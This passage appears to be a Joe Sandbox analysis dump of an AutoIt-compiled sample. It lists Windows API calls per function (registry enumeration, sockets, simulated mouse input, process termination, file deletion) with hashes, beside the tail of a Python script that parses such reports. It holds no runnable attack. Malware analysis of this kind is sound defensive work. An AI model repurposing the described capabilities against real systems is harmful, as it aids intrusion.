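• _wcscat.LIBCMT ref: 00B11C69
• Process32NextW.KERNEL32(00000000,?), ref: 00B11CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00B11CF1
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API String ID: 1380811348-0
• Opcode ID: 7132ec059101f3b3775926f126982a21a02c94ccce60d34fcb9938163978138d
APIs
  • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B130AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B130EF
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B1313B
• RegCloseKey.ADVAPI32(00000000), ref: 00B1318B
Similarity
• String ID:
• Opcode ID: 9c74132370d35b093b57708e025934654fe88e486a9c09e1df0ddfaec17ceec2
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00B4DC00), ref: 00B08E7C
• WSAGetLastError.WSOCK32(00000000), ref: 00B08E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00B08EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 00B08EC5
• _strlen.LIBCMT ref: 00B08EF7
• Opcode ID: 14ea0bf62613ff7de54605951f750f0488a304d30821be6d995a080c9062a925
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

Run it against a saved copy of the full report (the text as rendered, not the HTML) to get one row per function; the `opcode_id` field is the stable key for pivoting to other reports, since the same AutoIt stub function carries the same Opcode ID wherever it is dumped.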
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • BeginPaint.USER32(?,?,?), ref: 00ACAC2A
                                                              • GetWindowRect.USER32(?,?), ref: 00ACAC8E
                                                              • ScreenToClient.USER32(?,?), ref: 00ACACAB
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00ACACBC
                                                              • EndPaint.USER32(?,?,?,?,?), ref: 00ACAD06
                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B2E673
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                              • String ID:
                                                              • API String ID: 2592858361-0
                                                              • Opcode ID: c28104dfd264f95a8b93137667c468804652612859a6595841b489460f8e71dc
                                                              • Instruction ID: 7a5183a21cbb1ca8bdbce1b72a3b7e7ef4c82763ac655e14c7e6517ae3cea0ca
                                                              • Opcode Fuzzy Hash: c28104dfd264f95a8b93137667c468804652612859a6595841b489460f8e71dc
                                                              • Instruction Fuzzy Hash: 3041AF701042049FC711DF69DC85FBA7BF8EB69724F14066DF9A9872A1CB319884DB62
                                                              APIs
                                                              • ShowWindow.USER32(00B71628,00000000,00B71628,00000000,00000000,00B71628,?,00B2DC5D,00000000,?,00000000,00000000,00000000,?,00B2DAD1,00000004), ref: 00B1E40B
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00B1E42F
                                                              • ShowWindow.USER32(00B71628,00000000), ref: 00B1E48F
                                                              • ShowWindow.USER32(00000000,00000004), ref: 00B1E4A1
                                                              • EnableWindow.USER32(00000000,00000001), ref: 00B1E4C5
                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B1E4E8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 6e8c235094b40896a91d934db8264272d2d24ca9ba11c00a7db7fa0d54daa0f7
                                                              • Instruction ID: 0102a52d4cbb7196c6b3abfc0e9d49a75158e0bcf974c0a89de3653735e6412c
                                                              • Opcode Fuzzy Hash: 6e8c235094b40896a91d934db8264272d2d24ca9ba11c00a7db7fa0d54daa0f7
                                                              • Instruction Fuzzy Hash: 52410934601151EFDB26CF24D499BD87BE1FF09304F9841A9EE698F2A2C731E881DB91
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AF98D1
                                                                • Part of subcall function 00ACF4EA: std::exception::exception.LIBCMT ref: 00ACF51E
                                                                • Part of subcall function 00ACF4EA: __CxxThrowException@8.LIBCMT ref: 00ACF533
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AF9908
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00AF9924
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00AF999E
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AF99B3
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF99D2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 2537439066-0
                                                              • Opcode ID: 46d69ad8600afc412b44c558f40f130e7f8a720b03a7a16a7663396b75ff73bf
                                                              • Instruction ID: f7336789add33acd8cd385b43029e5b32488ff8991ff59ed36ca3199b883bc51
                                                              • Opcode Fuzzy Hash: 46d69ad8600afc412b44c558f40f130e7f8a720b03a7a16a7663396b75ff73bf
                                                              • Instruction Fuzzy Hash: 3E318131A00105AFDB10DFA9DD85EAFB7B9FF45710B2580A9F904AB256DB70DE14CBA0
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00B077F4,?,?,00000000,00000001), ref: 00B09B53
                                                                • Part of subcall function 00B06544: GetWindowRect.USER32(?,?), ref: 00B06557
                                                              • GetDesktopWindow.USER32 ref: 00B09B7D
                                                              • GetWindowRect.USER32(00000000), ref: 00B09B84
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B09BB6
                                                                • Part of subcall function 00AF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7AD0
                                                              • GetCursorPos.USER32(?), ref: 00B09BE2
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B09C44
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: 5f5b44b879d40f638897b3d1e8f8550f27603818f4ff0195b3f512f94f4e4133
                                                              • Instruction ID: fca15fe152a766fd9584bc087fa6d7a237b428c4832f34c96cb978b0abe29151
                                                              • Opcode Fuzzy Hash: 5f5b44b879d40f638897b3d1e8f8550f27603818f4ff0195b3f512f94f4e4133
                                                              • Instruction Fuzzy Hash: 6131CF72604309ABC710DF54DC49F9EBBE9FF89314F00091AF595D7192DA31EA14CB92
                                                              APIs
                                                                • Part of subcall function 00ACAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ACAFE3
                                                                • Part of subcall function 00ACAF83: SelectObject.GDI32(?,00000000), ref: 00ACAFF2
                                                                • Part of subcall function 00ACAF83: BeginPath.GDI32(?), ref: 00ACB009
                                                                • Part of subcall function 00ACAF83: SelectObject.GDI32(?,00000000), ref: 00ACB033
                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B1EC20
                                                              • LineTo.GDI32(00000000,00000003,?), ref: 00B1EC34
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B1EC42
                                                              • LineTo.GDI32(00000000,00000000,?), ref: 00B1EC52
                                                              • EndPath.GDI32(00000000), ref: 00B1EC62
                                                              • StrokePath.GDI32(00000000), ref: 00B1EC72
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                              • String ID:
                                                              • API String ID: 43455801-0
                                                              • Opcode ID: 6625ad7ca0fb7bac84ceef08fb14c56ece99c1caea2e58a54be537ed7d8290ac
                                                              • Instruction ID: a7ca21204f796ced0d78bfef47d5ce517da18a7d46d061a6fe4419dde4063645
                                                              • Opcode Fuzzy Hash: 6625ad7ca0fb7bac84ceef08fb14c56ece99c1caea2e58a54be537ed7d8290ac
                                                              • Instruction Fuzzy Hash: 6F111E7200014DBFDF019FA4ED88EEA7F6DEB08354F148116BE1896160DB71DD95DBA0
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00AEE1C0
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00AEE1D1
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AEE1D8
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00AEE1E0
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AEE1F7
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00AEE209
                                                                • Part of subcall function 00AE9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00AE9A05,00000000,00000000,?,00AE9DDB), ref: 00AEA53A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                              • String ID:
                                                              • API String ID: 603618608-0
                                                              • Opcode ID: af0a4b893f20678afeb766f76dce56c5e5a4a8117aeaff454a40a29226f9eec8
                                                              • Instruction ID: d94b88f9ec0aeca2824dbc87443bb0d325cfb5f3e56806a2912383282726ca7f
                                                              • Opcode Fuzzy Hash: af0a4b893f20678afeb766f76dce56c5e5a4a8117aeaff454a40a29226f9eec8
                                                              • Instruction Fuzzy Hash: 4C018FB5A00754BFEB109BA69C46B5EBFB8EB48751F104066FE08A7290DA709C01CBA0
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00AD7B47
                                                                • Part of subcall function 00AD123A: __initp_misc_winsig.LIBCMT ref: 00AD125E
                                                                • Part of subcall function 00AD123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AD7F51
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AD7F65
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AD7F78
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AD7F8B
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AD7F9E
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AD7FB1
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AD7FC4
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AD7FD7
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AD7FEA
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AD7FFD
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AD8010
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AD8023
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AD8036
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AD8049
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AD805C
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00AD806F
                                                              • __mtinitlocks.LIBCMT ref: 00AD7B4C
                                                                • Part of subcall function 00AD7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00B6AC68,00000FA0,?,?,00AD7B51,00AD5E77,00B66C70,00000014), ref: 00AD7E41
                                                              • __mtterm.LIBCMT ref: 00AD7B55
                                                                • Part of subcall function 00AD7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AD7B5A,00AD5E77,00B66C70,00000014), ref: 00AD7D3F
                                                                • Part of subcall function 00AD7BBD: _free.LIBCMT ref: 00AD7D46
                                                                • Part of subcall function 00AD7BBD: DeleteCriticalSection.KERNEL32(00B6AC68,?,?,00AD7B5A,00AD5E77,00B66C70,00000014), ref: 00AD7D68
                                                              • __calloc_crt.LIBCMT ref: 00AD7B7A
                                                              • GetCurrentThreadId.KERNEL32 ref: 00AD7BA3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 2942034483-0
                                                              • Opcode ID: 873a5c0eaa7e50454403905df86f5e3334a81794231da90105329a0aab7ae205
                                                              • Instruction ID: e3ac465f24003e7a534082eb8c244a00c714247da85d4640406efe5ef8ec0525
                                                              • Opcode Fuzzy Hash: 873a5c0eaa7e50454403905df86f5e3334a81794231da90105329a0aab7ae205
                                                              • Instruction Fuzzy Hash: CCF0903210D7121AEB2D77347E0BA4E37949F01730B200AABF8A3D63E2FF2588414560
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AB281D
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AB2825
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AB2830
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AB283B
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AB2843
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AB284B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 1e14895e49b7f97820af30084766a04b09a3de127291e5c8bb0ce16b09745b33
                                                              • Instruction ID: 78d76529f3faca708ab986cc3836835a124463a531b826e1a5f454d31c8bc645
                                                              • Opcode Fuzzy Hash: 1e14895e49b7f97820af30084766a04b09a3de127291e5c8bb0ce16b09745b33
                                                              • Instruction Fuzzy Hash: 330167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 1423608774-0
                                                              • Opcode ID: 54c0915f535638d7204cde2f8c2a6ff73f93032e36cee40733cb6bc21e2dc507
                                                              • Instruction ID: e7bdcef59120d1ef6d85fd1431a92d0c43e80519afa404caaee9aaa84d1c03cb
                                                              • Opcode Fuzzy Hash: 54c0915f535638d7204cde2f8c2a6ff73f93032e36cee40733cb6bc21e2dc507
                                                              • Instruction Fuzzy Hash: BF018132142216ABD7252BA4FD48EFFB76AFF88741B14052AF603930A0DF649811DB50
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AF7C07
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AF7C1D
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00AF7C2C
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF7C3B
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF7C45
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF7C4C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 1866109a2e0494b509704d6f1e45f3e37956f0a8056dff07d7706331f496b42b
                                                              • Instruction ID: 0e5cbc241f369672c07f2ac37de4de958d6898d5b366e90ff1a1ef0a9905e2b7
                                                              • Opcode Fuzzy Hash: 1866109a2e0494b509704d6f1e45f3e37956f0a8056dff07d7706331f496b42b
                                                              • Instruction Fuzzy Hash: 80F03A76241558BBE7215BA2AC0EEEF7B7CEFC6B11F100018FA11A2051DBA05A42D6B5
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00AF9A33
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF9A44
                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF9A51
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF9A5E
                                                                • Part of subcall function 00AF93D1: CloseHandle.KERNEL32(?,?,00AF9A6B,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF93DB
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF9A71
                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF9A78
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              APIs
                                                                • Part of subcall function 00ACF4EA: std::exception::exception.LIBCMT ref: 00ACF51E
                                                                • Part of subcall function 00ACF4EA: __CxxThrowException@8.LIBCMT ref: 00ACF533
                                                              • __swprintf.LIBCMT ref: 00AB1EA6
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AB1D49
                                                              Similarity
                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 2125237772-557222456
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00B0B006
                                                              • CharUpperBuffW.USER32(?,?), ref: 00B0B115
                                                              • VariantClear.OLEAUT32(?), ref: 00B0B298
                                                                • Part of subcall function 00AF9DC5: VariantInit.OLEAUT32(00000000), ref: 00AF9E05
                                                                • Part of subcall function 00AF9DC5: VariantCopy.OLEAUT32(?,?), ref: 00AF9E0E
                                                                • Part of subcall function 00AF9DC5: VariantClear.OLEAUT32(?), ref: 00AF9E1A
                                                              Strings
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              APIs
                                                                • Part of subcall function 00ACC6F4: _wcscpy.LIBCMT ref: 00ACC717
                                                              • _memset.LIBCMT ref: 00AF5438
                                                              • GetMenuItemInfoW.USER32(?), ref: 00AF5467
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AF5513
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AF553D
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AF027B
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AF02B1
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AF02C2
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AF0344
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF5075
                                                              • GetMenuItemInfoW.USER32 ref: 00AF5091
                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00AF50D7
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B71708,00000000), ref: 00AF5120
                                                              Strings
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AFE742
                                                              • GetLastError.KERNEL32(?,00000000), ref: 00AFE768
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AFE78D
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AFE7B9
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
